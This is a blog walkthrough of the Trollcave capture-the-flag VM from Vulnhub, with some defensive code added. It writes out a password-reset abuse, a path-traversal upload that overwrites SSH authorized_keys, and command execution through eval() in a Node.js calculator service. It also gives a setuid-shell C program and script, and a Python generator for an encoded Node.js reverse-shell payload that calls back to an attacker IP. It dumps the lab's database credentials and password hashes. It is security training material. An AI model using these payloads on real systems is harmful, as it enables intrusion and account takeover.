[Vulnhub] Target VM: TROLLCAVE

Preface

  • Brief notes from working through Vulnhub boxes

TROLLCAVE

Description

Trollcave is a vulnerable VM, in the tradition of Vulnhub and infosec wargames in general. You start with a VM you know nothing about: no usernames, no passwords, only what you can see on the network. In this case, you will see a simple community blogging website with a large number of users. From this initial point, you enumerate the services and general characteristics of the machine and work out a way to fully compromise it by finding and exploiting vulnerabilities and misconfigurations.

Your first goal is to abuse the services on the machine to gain unauthorized shell access. Your ultimate goal is to read a text file in the root user's home directory (/root/flag.txt).

This VM is designed to be holistic and fairly realistic. I wanted to simulate a real attack on a real website rather than present a puzzle box of disparate elements, and I wanted to avoid the more esoteric vulnerable-VM-isms, such as having to do signal processing on an MP3 to discover a port-knocking sequence. Of course, there is always a trade-off between realism and what is most interesting/challenging, but I tried to keep the challenge grounded.

Since this is a VM that you download, import and boot, one way to achieve the goal is to mount the VM's hard disk. I have not encrypted the disk or done anything to prevent this, so if you want to go that route, go ahead. I am also not offering prizes or anything for completing this VM, so be aware that doing so is entirely pointless.

Since this is a VM running a real operating system with real services, there may be ways to get root that I did not intend. Ideally this should be part of the fun, but if they make the box trivial I would like to know about them and fix them, within reason. In this release I have installed all updates for Ubuntu Server 16.04 LTS, but I cannot and will not try to patch this VM against every new Linux kernel vulnerability that comes out. So here is a hint: you do not need to use a kernel exploit to root this box.

You will need a good HTTP intercepting proxy (I recommend Burp Suite) and some networking tools such as nmap and nc. You will also need virtualization software: VirtualBox is the easiest for most people, but KVM and VMware should also be able to import the .ova file after a little fiddling. Once the VM is imported, put it on the same network as your attacking system (preferably without Internet access) and start hacking!

You can get the .ova file here (929MB) (updated 19 March 2018). Let me know what you think.

Not for VMware. Changelog: v1.1 - 19/03/2018, v1.2 - 21/03/2018

Target VM: https://www.vulnhub.com/entry/trollcave-12,230/

Getting started with Trollcave

1. Confirm the target is up by scanning for its IP; either of these works:

netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2. Scan the target's open ports:

nmap -sV -sC -A 192.168.1.108

3. Visit the home page. A hint mentions password_resets, so enumerate that directory:

gobuster dir -u http://192.168.1.104/password_resets -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

dirb http://192.168.1.104/password_resets

This turns up the arbitrary password reset directory:
http://192.168.1.104/password_resets/new

4. Change King's password by modifying the GET parameter:

http://192.168.1.104/password_resets/edit.aSp4X7kLnpkxOH4xu4Nyug?name=King

5. After logging in there is a file upload; enable it first, then upload. Because the site is written in Ruby, a webshell is useless, so we rely on the hint about rails and guess that a rails user exists. nmap showed that SSH accepts key-based login, so we use the file upload to overwrite /home/rails/.ssh/authorized_keys and then log in. The commands are shown below:

ssh-keygen -f rails  # generate a new key pair: private key "rails", public key "rails.pub"
mv rails.pub authorized_keys  # rename the public key
# upload it through the directory traversal so it lands at ../../../../../../home/rails/.ssh/authorized_keys
mv rails id_rsa-rails  # rename the private key
ssh -i id_rsa-rails rails@192.168.1.104  # log in without a password
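The overwrite above works because the uploader trusts the client-supplied path. As an added defensive example (not code from Trollcave or from this walkthrough), here is how a Ruby/Rails upload handler can pin the destination under its upload directory; the UPLOAD_ROOT value is an assumption.

```ruby
# Added example, not code from Trollcave or this walkthrough.
# UPLOAD_ROOT is a constructed value standing in for the app's real upload directory.
UPLOAD_ROOT = "/var/www/trollcave/public/uploads".freeze

class UnsafeUploadPath < StandardError; end

# Resolve a client-supplied filename and return the absolute destination, or raise.
def safe_upload_path(filename, root = UPLOAD_ROOT)
  raise UnsafeUploadPath, "empty filename" if filename.nil? || filename.empty?
  # File.expand_path raises on NUL bytes and expands "~user" to a home directory,
  # so both are rejected before anything is resolved.
  raise UnsafeUploadPath, "NUL byte in filename" if filename.include?("\0")
  raise UnsafeUploadPath, "tilde expansion not allowed" if filename.start_with?("~")

  # "." and ".." are resolved against root here. An absolute name ("/etc/passwd") or
  # enough "../" to climb out ("../../../../../../home/rails/.ssh/authorized_keys")
  # resolves to a path outside root, which the prefix check catches.
  target = File.expand_path(filename, root)
  unless target.start_with?(root + File::SEPARATOR)
    raise UnsafeUploadPath, "#{filename.inspect} resolves outside the upload root"
  end
  target
end

# Boolean form, handy in a controller guard or a test.
def upload_path_allowed?(filename, root = UPLOAD_ROOT)
  safe_upload_path(filename, root)
  true
rescue UnsafeUploadPath
  false
end

if __FILE__ == $0
  # Constructed sample names: one benign, one the traversal used above.
  ["avatar.png", "../../../../../../home/rails/.ssh/authorized_keys"].each do |name|
    puts "#{name.inspect} -> #{upload_path_allowed?(name) ? safe_upload_path(name) : 'REJECTED'}"
  end
end
```

Subdirectories under the upload root are still allowed by this check; restrict further if the application never needs them.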

6. Privilege escalation on this box

1. First, information gathering: the database credentials are in the config directory of the web application:

production:
  adapter: postgresql
  encoding: unicode
  database: trollcave
  pool: 5
  host: localhost
  username: tc
  password: sowvillagedinnermoment

2. Next, read the database file with sqlite3:

sqlite> select * from private_messages
...> ;
1|password|
use it sparingly

uFrrK3dXzWeZQ7JtGgZk4FT

do NOT share it
|1|3|2017-09-29 14:03:24.494241|2017-09-29 14:03:24.494241
sqlite> .tables
admin_settings comments reports user_files
blogs private_messages schema_migrations users
sqlite> select * from users;
1|King|king@trollcave.com|:)|$2a$10$tHX6EGkwuapTRY1/7R/meuVPLUT8Tkooh0M6WpQpGKOSSwuuc.7C.||5|0|||2017-09-29 14:03:23.339227|2017-09-29 14:03:23.339227|||
2|dave|david@32letters.com|nah lol|$2a$10$DpHp4ikbNnq/43uhbjWJcee9lTLDTTx2ndtSl99m81wDSvNBuztiS||4|0|||2017-09-29 14:03:23.414352|2017-09-29 14:03:23.414352|||
3|dragon|dragon@trollcave.com|Over fire and over stone / Over water and over bone / Shining out like jewels of light / On a sheet of purest night|$2a$10$XmozUYK/xikEb7CktLCer.LXwXYFDzISlCNGKGh8sxyqy7OunCdFS||4|0|||2017-09-29 14:03:23.484532|2017-09-29 14:03:23.484532|||
4|coderguy|coderguy@trollcave.com|;)|$2a$10$XVAiu4/71LV.2JA5e6UZr.BEIvSpAI0Wt8YqKU0FOdcKwcQIAppLO||4|0|||2017-09-29 14:03:23.550390|2017-09-29 14:03:23.550390|||
5|cooldude89|kewldewdeightynine@zmail.com|i am the dankest|$2a$10$HR0yIsnfKaSG07Kge5Z7K.Ki7dthW3IqQ0PYd/ZS3rA.KFjWv92z.||3|0|||2017-09-29 14:03:23.616162|2017-09-29 14:03:23.616162|||
6|Sir|sir@zmail.com|It's super secure|$2a$10$tYaFo0fGxFreOdFBy3ch5ej/UrznlUQBcM8l7il0Zx25ca6as/xza||3|0|||2017-09-29 14:03:23.682157|2017-09-29 14:03:23.682157|||
7|Q|q@zmail.com|Your normal password|$2a$10$gTZ1kX5xHLp0JT78n.UMeeAd789/5h1p8Ox4L2e4rCIVPImb6vOfu||3|0|||2017-09-29 14:03:23.753882|2017-09-29 14:03:23.753882|||
8|teflon|tf@zmail.com|swordfish|$2a$10$F5Ajt2HI.7xshVrHJqZy6.Iv2myLqDJwgyzBDogDe79WlDdIrsBDO||3|0|||2017-09-29 14:03:23.819291|2017-09-29 14:03:23.819291|||
9|TheDankMan|dope@dankmail.com|420|$2a$10$bbI2A71mL5pcCtY/mB4nIeQzxi4z6/c/K/0RpurZMMfBn4I7JGGlm||2|0|||2017-09-29 14:03:23.884605|2017-09-29 14:03:23.884605|||
10|artemus|artemus_12145@zmail.com|garden|$2a$10$x/L0IWKs29nrN9qOVisPzeIJIrBaZfCMXWJdco6DUtZlGMOAuWrmO||2|0|||2017-09-29 14:03:23.950848|2017-09-29 14:03:23.950848|||
11|MrPotatoHead|potatoe@zmail.com|you know...|$2a$10$AmuZ8ccJ4r3kaAc13ycjTezsAbvtF66lNkq2R7tXmLNWuf8U12sLG||2|0|||2017-09-29 14:03:24.016908|2017-09-29 14:03:24.016908|||
12|Ian|iane@zmail.com|a|$2a$10$InZ5.qJvFkgZX76xw8ZqGekxhwmvGCaRNBqU0rroOqG4RRuSZsXFK||2|0|||2017-09-29 14:03:24.082082|2017-09-29 14:03:24.082082|||
13|kev|kevin@zmail.com|mother's maiden name|$2a$10$D13SoP5GCHC6RkIBOQSXKuQf9E9h5Mo1evGZJa9p23xzUSkfugj7S||1|0|||2017-09-29 14:03:24.149092|2017-09-29 14:03:24.149092|||
14|notanother|notanother@zmail.com|(:|$2a$10$PYqCCOIop.NRMWm13ue26eEkc/ZR/7rDCOpiN5.9rkZ7/GSUcJ8rC||1|0|||2017-09-29 14:03:24.215992|2017-09-29 14:03:24.215992|||
15|anybodyhome|anybodyhome@zmail.com|no one is|$2a$10$Dc1Q8NufJ/oEZLeIxFWASOT4Kj4/WHzmTNUaD6U9omBtKapLJFKse||1|0|||2017-09-29 14:03:24.282237|2017-09-29 14:03:24.282237|||
16|onlyme|onlymememe@zmail.com|It is what it is|$2a$10$X4DKSco.clov.ro0pcN.nO1DYa3V/PRAQq6oOQCb/TW.MJyaHqSnW||1|0|||2017-09-29 14:03:24.348750|2017-09-29 14:03:24.348750|||
17|xer|xer@zmail.com|fave pronoun|$2a$10$rjjHGOYhobwzMPysTjd0k.OWH4x/FlnCtIv6VjPstLR3RWYOSHyQ6||1|0|||2017-09-29 14:03:24.414057|2017-09-29 14:03:24.414057|||

Next, try connecting to the PostgreSQL database on port 5432. Kali cannot reach it directly, so the port has to be forwarded out.

Shortcut: Shift + ~ + C (the ssh escape sequence, typed right after a newline)

3. This opens the ssh command line, where the port forward is entered:

ssh> -L 5432:localhost:5432

Check locally whether the forward worked.

4. Connect to PostgreSQL with DBeaver, using the password collected above. Nothing useful was found there.

5. Forward port 8888 to the local machine in the same way and browse it; the keyword calc shows up, so search the filesystem for calc:

find / -iname calc 2>/dev/null

This turns up a calc.js script in King's home directory, and it allows command execution:

var http = require("http");
var url = require("url");
var sys = require('sys');
var exec = require('child_process').exec;

// Start server
function start(route)
{
  function onRequest(request, response)
  {
    var theurl = url.parse(request.url);
    var pathname = theurl.pathname;
    var query = theurl.query;
    console.log("Request for " + pathname + query + " received.");
    route(pathname, request, query, response);
  }

  // Bound to loopback only, which is why port 8888 has to be forwarded over SSH
  http.createServer(onRequest).listen(8888, '127.0.0.1');
  console.log("Server started");
}

// Route request
function route(pathname, request, query, response)
{
  console.log("About to route request for " + pathname);
  switch (pathname)
  {
    // security risk
    /*case "/ping":
      pingit(pathname, request, query, response);
      break; */

    case "/":
      home(pathname, request, query, response);
      break;

    case "/calc":
      calc(pathname, request, query, response);
      break;

    default:
      console.log("404");
      display_404(pathname, request, response);
      break;
  }
}

function home(pathname, request, query, response)
{
  response.end("<h1>The King's Calculator</h1>" +
    "<p>Enter your calculation below:</p>" +
    "<form action='/calc' method='get'>" +
    "<input type='text' name='sum' value='1+1'>" +
    "<input type='submit' value='Calculate!'>" +
    "</form>" +
    "<hr style='margin-top:50%'>" +
    "<small><i>Powered by node.js</i></small>"
  );
}

function calc(pathname, request, query, response)
{
  sum = query.split('=')[1];
  console.log(sum)
  response.writeHead(200, {"Content-Type": "text/plain"});

  // The raw query value goes straight into eval(): arbitrary JavaScript, and through
  // it arbitrary commands, runs as the user that owns this process
  response.end(eval(sum).toString());
}

function ping(pathname, request, query, response)
{
  ip = query.split('=')[1];
  console.log(ip)
  response.writeHead(200, {"Content-Type": "text/plain"});

  // Route is commented out above, but it is the same pattern: unsanitized input in a shell command
  exec("ping -c4 " + ip, function(err, stdout, stderr) {
    response.end(stdout);
  });
}

function display_404(pathname, request, response)
{
  response.write("<h1>404 Not Found</h1>");
  response.end("I don't have that page, sorry!");
}

// Start the server and route the requests
start(route);
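As an added defensive example (this is neither Trollcave's calc.js nor code from the walkthrough), the handler logic below keeps the calculator feature but evaluates sum with a strict arithmetic parser instead of eval(), and reads the parameter with the URL API instead of query.split('=')[1]; the base URL and the length limit are assumptions.

```javascript
// Added example (not Trollcave's calc.js): a strict arithmetic parser in place of eval(sum).
// Grammar: expr = term (('+'|'-') term)*; term = factor (('*'|'/') factor)*;
// factor = number | '(' expr ')' | '-' factor. Anything else is rejected.
function tokenize(src) {
  const re = /\s*(\d+(?:\.\d+)?|[-+*\/()])/y; // sticky: every character must match
  const tokens = [];
  for (let pos = 0; pos < src.length; pos = re.lastIndex) {
    re.lastIndex = pos;
    const m = re.exec(src);
    if (m === null) throw new Error(`unexpected character at offset ${pos}`);
    tokens.push(m[1]);
  }
  return tokens;
}

// Recursive-descent evaluator over the token list; returns a number or throws.
function parseSum(src) {
  const toks = tokenize(src.trim());
  let i = 0;
  const peek = () => toks[i];
  function factor() {
    const t = toks[i++];
    if (t === undefined) throw new Error("unexpected end of input");
    if (t === "-") return -factor();
    if (t === "(") { const v = expr(); if (toks[i++] !== ")") throw new Error("missing ')'"); return v; }
    if (/^\d/.test(t)) return Number(t);
    throw new Error(`unexpected token '${t}'`);
  }
  function term() {
    let v = factor();
    while (peek() === "*" || peek() === "/") v = toks[i++] === "*" ? v * factor() : v / factor();
    return v;
  }
  function expr() {
    let v = term();
    while (peek() === "+" || peek() === "-") v = toks[i++] === "+" ? v + term() : v - term();
    return v;
  }
  const v = expr();
  if (i !== toks.length) throw new Error(`trailing input '${peek()}'`);
  return v;
}

// Hardened /calc logic: parse the query with the URL API (not query.split('=')[1]) and
// never eval. The form's "1+1" arrives as sum=1%2B1; a raw '+' in a query decodes to a space.
function safeCalc(rawUrl) {
  const sum = new URL(rawUrl, "http://127.0.0.1:8888").searchParams.get("sum");
  if (sum === null || sum.length > 200) return { status: 400, body: "missing or oversized sum" };
  try { return { status: 200, body: String(parseSum(sum)) }; }
  catch (e) { return { status: 400, body: "rejected: " + e.message }; }
}
```

Wire safeCalc into the "/calc" case by writing its status and body to the response; a request whose sum is not arithmetic is logged as a 400 rather than executed.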

Method 1

① Create a file exp.c in /tmp containing code that spawns a shell as king:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char *argv[])
{
    /* 1000 is used as king's uid here. With the setuid bit the effective uid is already
       1000; setting the real uid as well keeps bash from dropping back to the caller. */
    char *const shell_argv[] = {"/bin/bash", NULL};
    setreuid(1000, 1000);
    /* argv needs at least argv[0]; the original passed NULL */
    execve("/bin/bash", shell_argv, NULL);
    return 1; /* only reached if execve fails */
}

Compile it with gcc to exp:

gcc exp.c -o exp

② Create an executable script 1.sh in /tmp with the following content:

#!/bin/sh

cp /tmp/exp /tmp/exp-test
chmod 4777 /tmp/exp-test

Capture the request with Burp and run commands directly through the sum parameter of calc on port 8888, executing 1.sh with king's privileges.

This gives an exp running with king's privileges that any user can execute.

③ Root privileges

Method 2

① Generate the command-execution payload with a script found online:

#!/usr/bin/env python3
import sys

if len(sys.argv) != 3:
    print("Usage: %s <LHOST> <LPORT>" % (sys.argv[0]))
    sys.exit(0)

IP_ADDR = sys.argv[1]
PORT = sys.argv[2]

def charencode(string):
    """Encode a string as the comma-separated char codes that String.fromCharCode expects."""
    encoded = ''
    for char in string:
        encoded = encoded + "," + str(ord(char))
    return encoded[1:]

print("[+] LHOST = %s" % (IP_ADDR))
print("[+] LPORT = %s" % (PORT))
NODEJS_REV_SHELL = '''(function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(%s, "%s", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); })();1+1;''' % (PORT, IP_ADDR)
print("[+] Encoding")
PAYLOAD = charencode(NODEJS_REV_SHELL)
print("eval(String.fromCharCode(%s))" % (PAYLOAD))

② Run the script to generate the payload:

┌──(root💀kali)-[~/BC/trollcave]
└─# python exp.py 192.168.1.102 1234
[+] LHOST = 192.168.1.102
[+] LPORT = 1234
[+] Encoding

③ From the user logged in over SSH, send the generated eval(String.fromCharCode(...)) payload to http://127.0.0.1:8888/calc as the sum parameter with curl, while listening on port 1234 with nc on the attacking machine.




This yields a shell, and sudo bash gives root without a password.


My personal blog

孤桜懶契: http://gylq.gitee.io

Title: [Vulnhub] Target VM: TROLLCAVE

Author: 孤桜懶契

Published: 19 September 2021, 21:59:13

Last updated: 20 May 2022, 11:47:45

Original link: https://gylq.gitee.io/posts/151.html

License: CC BY-NC-ND 4.0 International. Please keep the original link and author when reposting.
